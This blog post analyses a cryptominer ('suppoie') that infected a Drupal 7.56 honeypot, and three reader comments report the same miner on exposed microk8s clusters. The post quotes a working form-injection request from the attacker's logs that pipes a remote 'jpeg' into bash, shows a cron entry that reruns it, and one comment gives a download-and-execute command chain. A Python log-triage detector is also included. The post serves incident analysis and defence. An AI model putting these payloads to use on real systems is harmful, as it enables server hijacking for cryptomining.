Suppoie Crypto Hijack

We found an interesting hack using a Drupal 7.56 honeypot. The attacker used a specially crafted URL to make the server pull down a "jpeg" image, which turned out to be a shell script. The script connects to a Monero mining pool and starts mining cryptocurrency on the server automatically. The vulnerability in this version of Drupal was exploited using curl.

Here’s all of the traffic from the attacker:

81.92.203.123 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"

81.92.203.123 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"
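As an added example (not code from the original post), here is a small Python triage script that parses Apache combined-format access-log lines like the three above, URL-decodes the request target and flags the Drupal Form API render-array keys (#post_render, #markup, #value), the PHP execution callback name and the fetch-and-pipe-to-shell pattern seen in this traffic. The sample input is the three attacker lines from this post plus one constructed benign request.

```python
import re
from urllib.parse import unquote_plus

# Apache combined log format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# Indicators taken from the traffic above. Each is matched against the URL-decoded
# request target, because the attacker percent-encoded '#', ' ' and '|'.
INDICATORS = [
    # Drupal Form API render-array keys injected through query parameters
    ("drupal_render_key", re.compile(r'#(post_render|markup|type|value)\b')),
    # PHP execution functions supplied as the render callback
    ("php_exec_callback", re.compile(r'\b(system|exec|passthru|shell_exec)\b')),
    # fetch-and-pipe-to-shell, the same pattern reused by the cron entry later in the post
    ("download_to_shell", re.compile(r'\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b')),
]

def analyze_line(line):
    """Return parsed fields plus the list of indicator names hit, or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = unquote_plus(m.group("target"))
    hits = [name for name, rx in INDICATORS if rx.search(decoded)]
    return {"host": m.group("host"), "time": m.group("time"),
            "status": m.group("status"), "agent": m.group("agent"),
            "decoded": decoded, "hits": hits}

def scan(lines):
    """Return the analyzed record for every line that hit at least one indicator."""
    return [r for r in map(analyze_line, lines) if r and r["hits"]]

# Sample input: the three attacker lines from this post plus one constructed benign request.
SAMPLE_LOG = [
    '81.92.203.123 - - [24/Apr/2018:01:34:08 +0000] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 403 36607 "-" "Ruby"',
    '81.92.203.123 - - [24/Apr/2018:02:00:41 +0000] "POST //?q=user/password&name[%23post_render][]=system&name[%23markup]=curl%20-s%20http://gmicameroon.com/logo7.jpg%20%7C%20bash%20-s&name[%23type]=markup HTTP/1.1" 200 21915 "-" "Ruby"',
    '81.92.203.123 - - [24/Apr/2018:02:00:42 +0000] "POST /?q=file/ajax/name/%23value/form-RR2WlQ5bBKZlJcllzKJ16U3bf-IU_aIP8ALAzixqPZw HTTP/1.1" 200 1931 "-" "Ruby"',
    '10.0.0.5 - - [24/Apr/2018:02:05:00 +0000] "GET /node/1 HTTP/1.1" 200 4321 "-" "Mozilla/5.0"',  # constructed benign line
]

if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["time"], r["host"], r["status"], ",".join(r["hits"]), "->", r["decoded"][:80])
```

Note that the first request was answered with a 403 and the second with a 200: the indicator hits, not the status code, are what make the second line worth escalating.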

The file logo7.jpg pulled down from the gmicameroon.com site is a script that runs the miner from /var/tmp/suppoie as www-data on the device:

It created /var/tmp/suppoie (d9531f405d7231ac1e518e5bc3d1da8c) and config.json. The config.json file contains embedded credentials for logging in to the mining pool as user '47M4CxQoC46hxKL1De83oZ6J2sYDPqyKN2F6sovD5mSHAKA4SrwYXmMBBJ75waQb3qZDAf6uA9HMtg9h9PSMst1k1EsUdwp':

A crontab entry is created to keep the script running:

[email protected] /var/tmp # crontab -u www-data -l
* * * * * curl -s http://gmicameroon.com/logo7.jpg | bash -s

If you're interested in doing analysis, I've added the code to download all of the files; the password to the zip is "infected".

Here's an analysis courtesy of the JoeSandbox tool we often use to analyze malware on this site.

3 Replies to “Suppoie Crypto Hijack”

  1. Found it on a fresh microk8s installation I had set up for testing. Unfortunately, the default install of microk8s is completely unsecured and within days it was hijacked.
    Command line:
    curl -o /var/tmp/config.json http://192.99.142.232:8220/222.json;curl -o /var/tmp/suppoie1 http://192.99.142.232:8220/tte2;chmod 777 /var/tmp/suppoie1;cd /var/tmp;./suppoie1 -c config.json

    Creates a bunch of cron tasks such as:
    * * * * * root /usr/bin/docker run -d --name java123 --restart=always --read-only -m 50M -c 512 tazaddobammi/picture124 -o 192.99.142.232:80 -o 192.99.142.249:3333 -o 202.144.193.110:3333 --donate-level 1 -u 4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg -p x -k

    Conclusion: do NOT install microk8s with its default config on a server exposed to the internet.

  2. I've found it as a replication controller in my Kubernetes cluster running under microk8s. It had added the following images to Docker: ahtihhebs/picture126 and ahtihhebs/picture128, running 10 replicas of one of them. Each replica was executing a suppoie1 command and adding an /etc/crontab record with a python string.
    To remove: remove all crontab entries, kill all processes (`pkill suppoie1`) and remove the replication controller from Kubernetes to stop it from recreating them.

  3. We found the same here. In the /var/tmp directory, look for a new directory called '…' owned by www-data; it contained miner data. Use rm -rf … to remove that directory.
